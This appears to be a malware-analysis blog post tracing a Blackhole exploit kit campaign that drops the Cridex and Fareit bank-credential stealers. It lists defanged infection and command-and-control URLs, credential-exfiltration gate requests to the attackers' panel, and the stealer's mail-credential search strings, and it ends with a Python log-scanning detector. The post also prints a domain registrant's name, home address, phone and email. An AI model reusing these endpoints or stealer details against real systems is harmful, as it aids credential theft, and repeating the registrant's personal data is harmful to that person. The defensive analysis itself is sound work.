As posted A WEEK AGO here -->>[Prev.Post], that crime group STILL infects victims. The infector concept and the way the binary works are exactly the same as in the previous case.

Infection Source Summary & Trojan Communication Info
Spam infector:
URL: h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
Server: Apache, WordPress
IP: 50.116.98.44

Blackhole:
Landing: h00p://latticesoft.net/detects/continues-little.php
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.14
IP: 59.57.247.185

Trojan Cridex (payload) download URL:
h00p://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d

Trojan Fareit download sources: 14 proxy hosts, each taking a POST HTTP/1.1 to h00p://<IP>:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ (IP list omitted here)
*) All proxies share port/server: 8080 / nginx/1.0.10

Trojan Fareit stealer download PoC, as in the example below:

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 94.73.129.120:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
[347-byte binary request body]
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 22 Dec 2012 08:29:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

Trojan Fareit callback IPs: 13 hosts, all h00p://<IP>:8080/asp/intro.php (IP list omitted here)

CnC is 62.76.177.51, PoC:
// Credentials sent to the CnC panel
var adminPanelLocation = 'h00p://62.76.177.51/if_Career/';
// Data modify process:
h00p://62.76.177.123/mx/2B/in/cp.php?h=8
// Phishing credentials URLs
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica

CnC passwords (reversed from Trojan Fareit): the full word list is omitted here.
Analysis Summary & Research Materials
This time I dumped all of Trojan Fareit's memory to a text file here -->>[PASTEBIN] ↑ so you can see which FTP, file and POP/SMTP credentials were leaked and grabbed, as evidence of this evil stealer's crime. Additionally, see the Fareit trojan's config here -->>[PASTEBIN] ↑ where you can confirm the targeted online banks plus the phishing HTML code these actors used. There is a slight BHEK change in the PluginDetect obfuscated code (landing page); I cracked it manually and wrote GUIDANCE to decode it here -->>[PASTEBIN]. PluginDetect before -->>[PASTEBIN] & after decoding -->>[PASTEBIN]. Payload binary static & dynamic analysis text (a quick one) -->>[PASTEBIN]. Sample download is here -->>[MEDIAFIRE]. Captured data (PCAP, RegShot, MEMShot, etc.) is here -->>[MEDIAFIRE]

Account Phishing Act by the Current Version of the Trojan
Hello Citi Account Online! Same as previous: Chase Bank! This time BANK OF AMERICA!!!

PoC of All Possible Email Credentials Also Grabbed
In the previous case I had strong requests to check not only the HTTP/FTP/server logins but the e-mail credentials as well. Here we go, the credential-search strings found in the binary:

POP3_Password2 SMTP_Password2 IMAP_Password2 HTTPMail_Password2 \Microsoft\Windows Live Mail Software\Microsoft\Windows Live Mail \Microsoft\Windows Mail Software\Microsoft\Windows Mail Software\RimArts\B2\Settings DataDir DataDirBak Mailbox.ini Software\Poco Systems Inc Path \PocoSystem.ini Program DataPath accounts.ini \Pocomail Software\IncrediMail EmailAddress Technology PopServer PopPort PopAccount PopPassword SmtpServer SmtpPort SmtpAccount SmtpPassword account.cfg account.cfn \BatMail \The Bat! Software\RIT\The Bat! Software\RIT\The Bat!\Users depot Working Directory ProgramDir Count Default Dir #%d SMTP Email Address SMTP Server POP3 Server POP3 User Name SMTP User Name NNTP Email Address NNTP User Name NNTP Server IMAP Server IMAP User Name Email HTTP User HTTP Server URL POP3 User IMAP User HTTPMail User Name HTTPMail Server SMTP User POP3 Port SMTP Port IMAP Port POP3 Password2 IMAP Password2 NNTP Password2 HTTPMail Password2 SMTP Password2 POP3 Password IMAP Password NNTP Password HTTP Password SMTP Password Software\Microsoft\Internet Account Manager\Accounts Identities Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Software\Microsoft\Internet Account Manager Outlook \Accounts identification identitymgr inetcomm server passwords outlook account manager passwords identities

VirusTotal Detection Ratio
Landing page: (3/45) ---->>[VirusTotal]
Trojan Cridex downloader: (15/44) ---->>[VirusTotal]
Trojan Fareit credential stealer: (4/45) ---->>[VirusTotal]

PoC / Analysis Screenshots
Malware processes: (screenshot)
Payload after self-copy (dropped) into %AppData%\ (screenshot)
Network HTTP traffic captured: (screenshot)

Need to fix the binary before reversing properly... // Very annoying anti-reverse....

: : :
0x00003cf2 (01) 47          INC EDI
0x00003cf3 (01) 5c          POP ESP
0x00003cf4 (05) a9 2835b437 TEST EAX, 0x37b43528
0x00003cf9 (03) 0ff2f8      PSLLD MM7, MM0
0x00003cfc (01) 4b          DEC EBX
0x00003cfd (01) 95          XCHG EBP, EAX
0x00003cfe (02) b2 f9       MOV DL, 0xf9
0x00003d00 (01) ef          OUT DX, EAX
0x00003d01 (01) 51          PUSH ECX
0x00003d02 (01) ac          LODSB
0x00003d03 (01) 46          INC ESI
0x00003d04 (02) 71 77       JNO 0x00003d7d   ; 1 0x00003d04 --------------------------------------------------
0x00003d06 (02) 72 71       JB  0x00003d79   ; 2 0x00003d06 --------------------------------------------------
0x00003d08 (02) 77 72       JA  0x00003d7c   ; 3 0x00003d08 --------------------------------------------------
0x00003d0a (02) 71 77       JNO 0x00003d83   ; 4 0x00003d0a --------------------------------------------------
0x00003d0c (02) 72 71       JB  0x00003d7f   ; 5
: : :

: : :
3CE8  50 44 44 33 D7 24 91 FF 62 27 47 5C A9 28 35 B4  PDD3.$..b'G..(5.
3CF8  37 0F F2 F8 4B 95 B2 F9 EF 51 AC 46 71 77 72 71  7...K....Q.Fqwrq
3D08  77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77  wrqwrqwrqwrqwrqw   // This qwrqwr :-(((
3D18  72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72  rqwrqwrqwrqwrqwr
3D28  71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71  qwrqwrqwrqwrqwrq
3D38  77 72 71 77 72 71 77 72 71 77 72 71 77 72 71 77  wrqwrqwrqwrqwrqw
3D48  72 71 77 72 71 77 72 71 77 72 71 77 72 71 77 72  rqwrqwrqwrqwrqwr
3D58  71 77 72 71 77 72 71 77 72 71 77 72 71 77 72 71  qwrqwrqwrqwrqwrq
: : :

PoC of the Same Group as the Previous Case
Seriously, it uses the same NS servers, registered by the same person..

// latticesoft.net < dns search
;; QUESTION SECTION:
;latticesoft.net. IN ANY
;; ANSWER SECTION:
latticesoft.net. 900 IN A 59.57.247.185
latticesoft.net. 900 IN SOA ns1.amishshoppe.net. . 1356192301 60 120 1048576 900
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.
;; AUTHORITY SECTION:
latticesoft.net. 900 IN NS ns2.amishshoppe.net.
latticesoft.net. 900 IN NS ns1.amishshoppe.net.
;; ADDITIONAL SECTION:
ns1.amishshoppe.net. 3600 IN A 209.140.18.37
ns2.amishshoppe.net. 3600 IN A 211.27.42.138

// PoC that the infector domain is currently in service:
a.root-servers.net. (198.41.0.4)
 |\___ i.gtld-servers.net [net] (192.43.172.30)
 |      |\___ ns2.amishshoppe.net [latticesoft.net] (211.27.42.138) *
 |       \___ ns1.amishshoppe.net [latticesoft.net] (209.140.18.37) Got authoritative answer
 (the identical delegation to ns2/ns1.amishshoppe.net from l, m, k, h, b, e, j, a, g, f, c and d.gtld-servers.net is omitted here; the IPv6 addresses of b and a.gtld-servers.net were not queried)

// Historical/pDNS related IP-domain info:
eaglepointecondo.org A 59.57.247.185
latticesoft.net A 59.57.247.185
eaglepointecondo.biz A 59.57.247.185
sessionid0147239047829578349578239077.pl A 59.57.247.185

// Check AXFR (see whether anyone can change records via a secondary DNS)
]$ nslookup
> set type=axfr
> amishshoppe.net
; Transfer failed.
Server: 8.8.8.8
Address: 8.8.8.8#53

// WHOIS database of the DNS service domain....
Domain Name: AMISHSHOPPE.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS1.AMISHSHOPPE.NET
Name Server: NS2.AMISHSHOPPE.NET
Status: clientTransferProhibited
Updated Date: 15-nov-2012
Creation Date: 15-nov-2012
Expiration Date: 15-nov-2013

// Registrant database checks...
Registrant:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: solaradvent@yahoo.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: amishshoppe.net
Created on..............: 2012-11-15
Expires on..............: 2013-11-15

Administrative Contact:
Steve Burandt
0n430 Peter Rd
Winfield, IL 60190
US
Phone: +1.6304626711
Email: solaradvent@yahoo.com

Technical Contact:
Registercom Domain Registrar
12808 Gran Bay Pkwy West
Jacksonville, FL 32258
US
Phone: +1.9027492701
Email: domainregistrar@register.com

DNS Servers:
ns2.amishshoppe.net
ns1.amishshoppe.net
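As an added detection example (not part of the original post): a Python scan over a constructed proxy-log sample that flags the three Fareit traffic shapes captured in the communication section above (the POST to a :8080 proxy on the stage-2 download path, the :8080 /asp/intro.php callback, and the gate.php?botid=...&bank= credential post to the 62.76.177.51 panel). The log format, the client IPs and the sample lines are constructed; the paths, hosts and User-Agent are the ones in the captures.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Indicators as they appear in the captures above (UA, paths, panel hosts).
FAREIT_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
DOWNLOAD_PATH = "/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/"
CALLBACK_PATH = "/asp/intro.php"
PANEL_HOSTS = {"62.76.177.51", "62.76.177.123"}

# Constructed sample log (not a real capture): ts client method url status "ua"
SAMPLE_LOG = """\
2012-12-22T08:29:40Z 10.0.0.7 GET http://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
2012-12-22T08:29:43Z 10.0.0.7 POST http://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ 200 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-22T08:30:01Z 10.0.0.7 POST http://132.248.49.112:8080/asp/intro.php 200 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-22T08:41:12Z 10.0.0.7 POST http://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase 200 "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
2012-12-22T08:42:00Z 10.0.0.9 GET http://example.org/index.html 200 "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
"""
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')

def classify(line):
    """Return the labels that apply to one log line ([] when nothing matches)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    method, url, ua = m.group(3), m.group(4), m.group(6)
    u = urlsplit(url)
    labels = []
    # Stage-2 pull: POST to a :8080 proxy on the fixed three-segment path.
    if method == "POST" and u.port == 8080 and u.path == DOWNLOAD_PATH:
        labels.append("fareit-stage-download")
    # Check-in to one of the :8080 /asp/intro.php callback hosts.
    if u.port == 8080 and u.path == CALLBACK_PATH:
        labels.append("fareit-callback")
    # Phished bank credentials sent to the panel's gate.php with botid + bank.
    if u.hostname in PANEL_HOSTS and u.path.endswith("/gate.php"):
        q = parse_qs(u.query)
        if "botid" in q and "bank" in q:
            labels.append("fareit-cred-exfil:" + q["bank"][0])
    # The captured User-Agent alone is a weak signal; report it only on its own.
    if not labels and ua == FAREIT_UA:
        labels.append("fareit-ua-only")
    return labels

def scan(log_text):
    """Return [(line_no, labels)] for every line carrying at least one label."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        labels = classify(line)
        if labels:
            hits.append((n, labels))
    return hits
```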
#MalwareMustDie